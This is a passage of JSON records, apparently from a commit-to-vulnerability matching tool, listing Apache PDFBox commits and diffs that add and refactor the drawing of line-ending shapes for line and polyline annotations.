"tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "dab190b906da7d0b2f30523a2b461d37f7d12dff", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526757317, - "hunks": 15, - "message": "PDFBOX-3353: draw line endings git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831914 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "index 7be318260..74f4bfc06 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "@@ -30,3 +30,8 @@ import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationPolyline;", - " import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - "+import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine;", - "+import static org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationLine.LE_NONE;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDBorderStyleDictionary;", - "+import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDAbstractAppearanceHandler.INTERIOR_COLOR_STYLES;", - "+import static org.apache.pdfbox.pdmodel.interactive.annotation.handlers.PDLineAppearanceHandler.ARROW_ANGLE;", - "+import org.apache.pdfbox.util.Matrix;", - "@@ -86,6 +91,7 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- rect.setLowerLeftX(Math.min(minX - ab.width / 2, rect.getLowerLeftX()));", - "- rect.setLowerLeftY(Math.min(minY - ab.width / 2, rect.getLowerLeftY()));", - "- rect.setUpperRightX(Math.max(maxX + ab.width, rect.getUpperRightX()));", - "- rect.setUpperRightY(Math.max(maxY + ab.width, rect.getUpperRightY()));", - "+ // arrow length is 9 * width at about 30\u00c2\u00b0 => 10 * width seems to be enough", - "+ rect.setLowerLeftX(Math.min(minX - ab.width * 10, rect.getLowerLeftX()));", - "+ rect.setLowerLeftY(Math.min(minY - ab.width * 10, rect.getLowerLeftY()));", - "+ rect.setUpperRightX(Math.max(maxX + ab.width * 10, rect.getUpperRightX()));", - "+ rect.setUpperRightY(Math.max(maxY + ab.width * 10, rect.getUpperRightY()));", - " annotation.setRectangle(rect);", - "@@ -96,3 +102,5 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "+ boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", - " setOpacity(cs, annotation.getConstantOpacity());", - "+ boolean hasStroke = cs.setStrokingColorOnDemand(color);", - "@@ -114,6 +122,5 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " // modify coordinate to shorten the segment", - "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - " float x1 = pathsArray[2];", - " float y1 = pathsArray[3];", - "-", - "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - " float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", - "@@ -127,11 +134,11 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- else if (i == pathsArray.length / 2 - 1)", - "+ else", - " {", - "- if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", - "+ if (i == pathsArray.length / 2 - 1 &&", - "+ SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", - " {", - " // modify coordinate to shorten the segment", - "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - " float x0 = pathsArray[pathsArray.length - 4];", - " float y0 = pathsArray[pathsArray.length - 3];", - "-", - "- // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - " float len = (float) (Math.sqrt(Math.pow(x0 - x, 2) + Math.pow(y0 - y, 2)));", - "@@ -145,15 +152,37 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- else", - "- {", - "- cs.lineTo(x, y);", - "- }", - " }", - "- //TODO line endings (LE) are missing", - "- // How it could be done by reusing some of the code from the line handler", - "- // 1) do a transform so that first and last \"arms\" are imagined flat", - "- // (like in line handler)", - "- // 2) refactor + reuse the line handler code that draws the ending shapes", - "+ cs.stroke();", - "+", - "+ // do a transform so that first and last \"arms\" are imagined flat, like in line handler", - " // the alternative would be to apply the transform to the LE shapes directly,", - " // which would be more work and produce code difficult to understand", - "- cs.stroke();", - "+", - "+ // this must be done after polyline draw, to avoid line crossing a filled shape", - "+ if (!LE_NONE.equals(annotation.getStartPointEndingStyle()))", - "+ {", - "+ // check only needed to avoid q cm Q if LE_NONE", - "+ float x2 = pathsArray[2];", - "+ float y2 = pathsArray[3];", - "+ float x1 = pathsArray[0];", - "+ float y1 = pathsArray[1];", - "+ cs.saveGraphicsState();", - "+ double angle = Math.atan2(y2 - y1, x2 - x1);", - "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", - "+ cs.restoreGraphicsState();", - "+ }", - "+", - "+ if (!LE_NONE.equals(annotation.getEndPointEndingStyle()))", - "+ {", - "+ // check only needed to avoid q cm Q if LE_NONE", - "+ float x1 = pathsArray[pathsArray.length - 4];", - "+ float y1 = pathsArray[pathsArray.length - 3];", - "+ float x2 = pathsArray[pathsArray.length - 2];", - "+ float y2 = pathsArray[pathsArray.length - 1];", - "+ // save / restore not needed because it's the last one", - "+ double angle = Math.atan2(y2 - y1, x2 - x1);", - "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "+ float lineLength = (float) Math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)));", - "+ drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, 0, ab.width, hasStroke, hasBackground);", - "+ }", - " }", - "@@ -220,2 +249,140 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "+", - "+ //TODO refactor to remove double code drawStyle and related", - "+ // (100% copied from line handler)", - "+", - "+ private void drawStyle(String style, final PDAppearanceContentStream cs, float x, float y,", - "+ float width, boolean hasStroke, boolean hasBackground) throws IOException", - "+ {", - "+ switch (style)", - "+ {", - "+ case PDAnnotationLine.LE_OPEN_ARROW:", - "+ case PDAnnotationLine.LE_CLOSED_ARROW:", - "+ if (Float.compare(x, 0) != 0)", - "+ {", - "+ // ending", - "+ drawArrow(cs, x - width, y, -width * 9);", - "+ }", - "+ else", - "+ {", - "+ // start", - "+ drawArrow(cs, width, y, width * 9);", - "+ }", - "+ if (PDAnnotationLine.LE_CLOSED_ARROW.equals(style))", - "+ {", - "+ cs.closePath();", - "+ }", - "+ break;", - "+ case PDAnnotationLine.LE_BUTT:", - "+ cs.moveTo(x, y - width * 3);", - "+ cs.lineTo(x, y + width * 3);", - "+ break;", - "+ case PDAnnotationLine.LE_DIAMOND:", - "+ drawDiamond(cs, x, y, width * 3);", - "+ break;", - "+ case PDAnnotationLine.LE_SQUARE:", - "+ cs.addRect(x - width * 3, y - width * 3, width * 6, width * 6);", - "+ break;", - "+ case PDAnnotationLine.LE_CIRCLE:", - "+ addCircle(cs, x, y, width * 3);", - "+ break;", - "+ case PDAnnotationLine.LE_R_OPEN_ARROW:", - "+ case PDAnnotationLine.LE_R_CLOSED_ARROW:", - "+ if (Float.compare(x, 0) != 0)", - "+ {", - "+ // ending", - "+ drawArrow(cs, x + width, y, width * 9);", - "+ }", - "+ else", - "+ {", - "+ // start", - "+ drawArrow(cs, -width, y, -width * 9);", - "+ }", - "+ if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(style))", - "+ {", - "+ cs.closePath();", - "+ }", - "+ break;", - "+ case PDAnnotationLine.LE_SLASH:", - "+ // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", - "+ cs.moveTo(x + (float) (Math.cos(Math.toRadians(60)) * width * 9),", - "+ y + (float) (Math.sin(Math.toRadians(60)) * width * 9));", - "+ cs.lineTo(x + (float) (Math.cos(Math.toRadians(240)) * width * 9),", - "+ y + (float) (Math.sin(Math.toRadians(240)) * width * 9));", - "+ break;", - "+ default:", - "+ break;", - "+ }", - "+ if (INTERIOR_COLOR_STYLES.contains(style))", - "+ {", - "+ cs.drawShape(width, hasStroke, hasBackground);", - "+ }", - "+ else if (!PDAnnotationLine.LE_NONE.equals(style))", - "+ {", - "+ // need to do this separately, because sometimes /IC is set anyway", - "+ cs.drawShape(width, hasStroke, false);", - "+ }", - "+ }", - "+", - "+ /**", - "+ * Add the two arms of a horizontal arrow.", - "+ * ", - "+ * @param cs Content stream", - "+ * @param x", - "+ * @param y", - "+ * @param len The arm length. Positive goes to the right, negative goes to the left.", - "+ * ", - "+ * @throws IOException If the content stream could not be written", - "+ */", - "+ private void drawArrow(PDAppearanceContentStream cs, float x, float y, float len) throws IOException", - "+ {", - "+ // strategy for arrows: angle 30\u00c2\u00b0, arrow arm length = 9 * line width", - "+ // cos(angle) = x position", - "+ // sin(angle) = y position", - "+ // this comes very close to what Adobe is doing", - "+ cs.moveTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y + (float) (Math.sin(ARROW_ANGLE) * len));", - "+ cs.lineTo(x, y);", - "+ cs.lineTo(x + (float) (Math.cos(ARROW_ANGLE) * len), y - (float) (Math.sin(ARROW_ANGLE) * len));", - "+ }", - "+", - "+ /**", - "+ * Add a square diamond shape (corner on top) to the path.", - "+ *", - "+ * @param cs Content stream", - "+ * @param x", - "+ * @param y", - "+ * @param r Radius (to a corner)", - "+ * ", - "+ * @throws IOException If the content stream could not be written", - "+ */", - "+ private void drawDiamond(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "+ {", - "+ cs.moveTo(x - r, y);", - "+ cs.lineTo(x, y + r);", - "+ cs.lineTo(x + r, y);", - "+ cs.lineTo(x, y - r);", - "+ cs.closePath();", - "+ }", - "+", - "+ /**", - "+ * Add a circle shape to the path.", - "+ *", - "+ * @param cs Content stream", - "+ * @param x", - "+ * @param y", - "+ * @param r Radius", - "+ * ", - "+ * @throws IOException If the content stream could not be written", - "+ */", - "+ private void addCircle(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "+ {", - "+ // http://stackoverflow.com/a/2007782/535646", - "+ float magic = r * 0.551784f;", - "+ cs.moveTo(x, y + r);", - "+ cs.curveTo(x + magic, y + r, x + r, y + magic, x + r, y);", - "+ cs.curveTo(x + r, y - magic, x + magic, y - r, x, y - r);", - "+ cs.curveTo(x - magic, y - r, x - r, y - magic, x - r, y);", - "+ cs.curveTo(x - r, y + magic, x - magic, y + r, x, y + r);", - "+ cs.closePath();", - "+ }", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "156003b56776cfeba3116b1f8a73337b297a1b13", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1524336114, - "hunks": 1, - "message": "PDFBOX-4071: add override git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1829741 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/fontbox/src/main/java/org/apache/fontbox/ttf/HeaderTable.java b/fontbox/src/main/java/org/apache/fontbox/ttf/HeaderTable.java", - "index 42c8b277d..a9ba6c9d4 100644", - "--- a/fontbox/src/main/java/org/apache/fontbox/ttf/HeaderTable.java", - "+++ b/fontbox/src/main/java/org/apache/fontbox/ttf/HeaderTable.java", - "@@ -73,2 +73,3 @@ public class HeaderTable extends TTFTable", - " */", - "+ @Override", - " public void read(TrueTypeFont ttf, TTFDataStream data) throws IOException" - ], - "changed_files": [ - "fontbox/src/main/java/org/apache/fontbox/ttf/HeaderTable.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "231a05e789db84f7653c7b07fe5b88b2054fea93", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1532798312, - "hunks": 16, - "message": "PDFBOX-3353: special handling for very small widths: don't draw borders, but draw the line, line ending shapes must be calculated based on size 1 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1836936 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "index 3e7310564..ee03faee1 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "@@ -96,2 +96,7 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - "+ // observed with diagonal line of AnnotationSample.Standard.pdf", - "+ // for line endings, very small widths must be treated as size 1.", - "+ // However the border of the line ending shapes is not drawn.", - "+ float lineEndingSize = (ab.width < 1e-5) ? 1 : ab.width;", - "+", - " // add/substract with, font height, and arrows", - "@@ -100,6 +105,6 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " //TODO find better way to calculate padding", - "- rect.setLowerLeftX(Math.min(minX - Math.max(ab.width * 10, Math.abs(llo+ll+lle)), rect.getLowerLeftX()));", - "- rect.setLowerLeftY(Math.min(minY - Math.max(ab.width * 10, Math.abs(llo+ll+lle)), rect.getLowerLeftY()));", - "- rect.setUpperRightX(Math.max(maxX + Math.max(ab.width * 10, Math.abs(llo+ll+lle)), rect.getUpperRightX()));", - "- rect.setUpperRightY(Math.max(maxY + Math.max(ab.width * 10, Math.abs(llo+ll+lle)), rect.getUpperRightY()));", - "+ rect.setLowerLeftX(Math.min(minX - Math.max(lineEndingSize * 10, Math.abs(llo+ll+lle)), rect.getLowerLeftX()));", - "+ rect.setLowerLeftY(Math.min(minY - Math.max(lineEndingSize * 10, Math.abs(llo+ll+lle)), rect.getLowerLeftY()));", - "+ rect.setUpperRightX(Math.max(maxX + Math.max(lineEndingSize * 10, Math.abs(llo+ll+lle)), rect.getUpperRightX()));", - "+ rect.setUpperRightY(Math.max(maxY + Math.max(lineEndingSize * 10, Math.abs(llo+ll+lle)), rect.getUpperRightY()));", - "@@ -183,3 +188,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- cs.moveTo(ab.width, y);", - "+ cs.moveTo(lineEndingSize, y);", - " }", - "@@ -200,4 +205,4 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - "- cs.lineTo(xOffset - ab.width, y);", - "- cs.moveTo(lineLength - xOffset + ab.width, y);", - "+ cs.lineTo(xOffset - lineEndingSize, y);", - "+ cs.moveTo(lineLength - xOffset + lineEndingSize, y);", - " }", - "@@ -205,3 +210,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- cs.lineTo(lineLength - ab.width, y);", - "+ cs.lineTo(lineLength - lineEndingSize, y);", - " }", - "@@ -211,3 +216,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- cs.drawShape(ab.width, hasStroke, false);", - "+ cs.drawShape(lineEndingSize, hasStroke, false);", - "@@ -233,3 +238,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " cs.lineTo(0 + lineLength / 2, y + captionVerticalOffset);", - "- cs.drawShape(ab.width, hasStroke, false);", - "+ cs.drawShape(lineEndingSize, hasStroke, false);", - " }", - "@@ -240,3 +245,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- cs.moveTo(ab.width, y);", - "+ cs.moveTo(lineEndingSize, y);", - " }", - "@@ -248,3 +253,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- cs.lineTo(lineLength - ab.width, y);", - "+ cs.lineTo(lineLength - lineEndingSize, y);", - " }", - "@@ -254,6 +259,6 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "- cs.drawShape(ab.width, hasStroke, false);", - "+ cs.drawShape(lineEndingSize, hasStroke, false);", - " }", - " cs.restoreGraphicsState();", - "-", - "+ ", - " // paint the styles here and not before showing the text, or the text would appear", - "@@ -262,2 +267,10 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - "+ // observed with diagonal line of file AnnotationSample.Standard.pdf", - "+ // when width is very small, the border of the line ending shapes ", - "+ // is not drawn.", - "+ if (ab.width < 1e-5)", - "+ {", - "+ hasStroke = false;", - "+ }", - "+", - " // check for LE_NONE only needed to avoid q cm Q for that case", - "@@ -269,3 +282,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "- drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);", - "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, lineEndingSize, hasStroke, hasBackground);", - " }", - "@@ -280,3 +293,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " cs.transform(Matrix.getTranslateInstance(xx1, yy1));", - "- drawStyle(annotation.getStartPointEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", - "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, 0, lineEndingSize, hasStroke, hasBackground);", - " }", - "@@ -296,3 +309,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "- drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, y, ab.width, hasStroke, hasBackground);", - "+ drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, y, lineEndingSize, hasStroke, hasBackground);", - " }", - "@@ -307,3 +320,3 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " cs.transform(Matrix.getTranslateInstance(xx2, yy2));", - "- drawStyle(annotation.getEndPointEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);", - "+ drawStyle(annotation.getEndPointEndingStyle(), cs, 0, 0, lineEndingSize, hasStroke, hasBackground);", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "273aa2a81340fcc982cd867d1d1776fcfb892575", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526743409, - "hunks": 3, - "message": "PDFBOX-3353: modify coordinate of line ending if there is a short style; don't do anything if path array is smaller than 4 git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831901 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "index 160f39289..fe8ab0b7e 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java", - "@@ -59,3 +59,3 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " float[] pathsArray = annotation.getVertices();", - "- if (pathsArray == null)", - "+ if (pathsArray == null || pathsArray.length < 4)", - " {", - "@@ -111,4 +111,36 @@ public class PDPolylineAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "+ if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", - "+ {", - "+ // modify coordinate to shorten the segment", - "+ float x1 = pathsArray[2];", - "+ float y1 = pathsArray[3];", - "+", - "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "+ float len = (float) (Math.sqrt(Math.pow(x - x1, 2) + Math.pow(y - y1, 2)));", - "+ if (Float.compare(len, 0) != 0)", - "+ {", - "+ x += (x1 - x) / len * ab.width;", - "+ y += (y1 - y) / len * ab.width;", - "+ }", - "+ }", - " cs.moveTo(x, y);", - " }", - "+ else if (i == pathsArray.length / 2 - 1)", - "+ {", - "+ if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", - "+ {", - "+ // modify coordinate to shorten the segment", - "+ float x0 = pathsArray[pathsArray.length - 4];", - "+ float y0 = pathsArray[pathsArray.length - 3];", - "+", - "+ // https://stackoverflow.com/questions/7740507/extend-a-line-segment-a-specific-distance", - "+ float len = (float) (Math.sqrt(Math.pow(x0 - x, 2) + Math.pow(y0 - y, 2)));", - "+ if (Float.compare(len, 0) != 0)", - "+ {", - "+ x -= (x - x0) / len * ab.width;", - "+ y -= (y - y0) / len * ab.width;", - "+ }", - "+ }", - "+ cs.lineTo(x, y);", - "+ }", - " else" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDPolylineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "594e42213d970aef4bec38d2e9802bef0a1df0e1", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528141979, - "hunks": 1, - "message": "PDFBOX-3353: add a //TODO for the work not done git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832888 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "index 00ba5c394..589cb7911 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "@@ -253,2 +253,5 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "+ //TODO support non-angled styles. This is more difficult than in the other handlers", - "+ // because the lines do not always go from (x1,y1) to (x2,y2) due to the leader lines", - "+ // when the \"y\" value above is not 0.", - " drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "f26f397e05ef27763568566791449dac80e5657c", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1526748884, - "hunks": 15, - "message": "PDFBOX-3353: refactor, extract line ending style drawing git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1831909 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "index 7bff8b71b..36bf7552c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", - "@@ -256,110 +256,83 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", - " boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "- String startPointEndingStyle = annotation.getStartPointEndingStyle();", - "- switch (startPointEndingStyle)", - "+ ", - "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);", - "+ drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, y, ab.width, hasStroke, hasBackground);", - "+ }", - "+ }", - "+ catch (IOException ex)", - "+ {", - "+ LOG.error(ex);", - "+ }", - "+ }", - "+", - "+ private void drawStyle(String style, final PDAppearanceContentStream cs, float x, float y,", - "+ float width, boolean hasStroke, boolean hasBackground) throws IOException", - "+ {", - "+ switch (style)", - "+ {", - "+ case PDAnnotationLine.LE_OPEN_ARROW:", - "+ case PDAnnotationLine.LE_CLOSED_ARROW:", - "+ if (Float.compare(x, 0) != 0)", - " {", - "- case PDAnnotationLine.LE_OPEN_ARROW:", - "- case PDAnnotationLine.LE_CLOSED_ARROW:", - "- drawArrow(cs, ab.width, y, ab.width * 9);", - "- if (PDAnnotationLine.LE_CLOSED_ARROW.equals(startPointEndingStyle))", - "- {", - "- cs.closePath();", - "- }", - "- break;", - "- case PDAnnotationLine.LE_BUTT:", - "- cs.moveTo(0, y - ab.width * 3);", - "- cs.lineTo(0, y + ab.width * 3);", - "- break;", - "- case PDAnnotationLine.LE_DIAMOND:", - "- drawDiamond(cs, 0, y, ab.width * 3);", - "- break;", - "- case PDAnnotationLine.LE_SQUARE:", - "- cs.addRect(0 - ab.width * 3, y - ab.width * 3, ab.width * 6, ab.width * 6);", - "- break;", - "- case PDAnnotationLine.LE_CIRCLE:", - "- addCircle(cs, 0, y, ab.width * 3);", - "- break;", - "- case PDAnnotationLine.LE_R_OPEN_ARROW:", - "- case PDAnnotationLine.LE_R_CLOSED_ARROW:", - "- drawArrow(cs, -ab.width, y, -ab.width * 9);", - "- if (PDAnnotationLine.LE_R_CLOSED_ARROW.equals(startPointEndingStyle))", - "- {", - "- cs.closePath();", - "- }", - "- break;", - "- case PDAnnotationLine.LE_SLASH:", - "- // the line is 18 x linewidth at an angle of 60\u00c2\u00b0", - "- cs.moveTo((float) (Math.cos(Math.toRadians(60)) * ab.width * 9),", - "- y + (float) (Math.sin(Math.toRadians(60)) * ab.width * 9));", - "- cs.lineTo((float) (Math.cos(Math.toRadians(240)) * ab.width * 9),", - "- y + (float) (Math.sin(Math.toRadians(240)) * ab.width * 9));", - "- break;", - "- default:", - "- break;", - "+ // ending", - "+ drawArrow(cs, x - width, y, -width * 9);", - " }", - "- if (INTERIOR_COLOR_STYLES.contains(startPointEndingStyle))", - "+ else", - " {", - "- cs.drawShape(ab.width, hasStroke, hasBackground);", - "+ // start", - "+ drawArrow(cs, width, y, width * 9);", - " }", - "- else if (!PDAnnotationLine.LE_NONE.equals(startPointEndingStyle))", - "+ if (PDAnnotationLine.LE_CLOSED_ARROW.equals(style))", - " {", - "- // need to do this separately, because sometimes /IC is set anyway", - "- cs.drawShape(ab.width, hasStroke, false);", - "+ cs.closePath();", - " }", - "-", - "- String endPointEndingStyle = annotation.getEndPointEndingStyle();", - "- switch (endPointEndingStyle)", - "+ break;", - "+ case PDAnnotationLine.LE_BUTT:", - "+ cs.moveTo(x, y - width * 3);", - "+ cs.lineTo(x, y + width * 3);", - "+ break;", - "+ case PDAnnotationLine.LE_DIAMOND:", - "+ drawDiamond(cs, x, y, width * 3);", - "+ break;", - "+ case 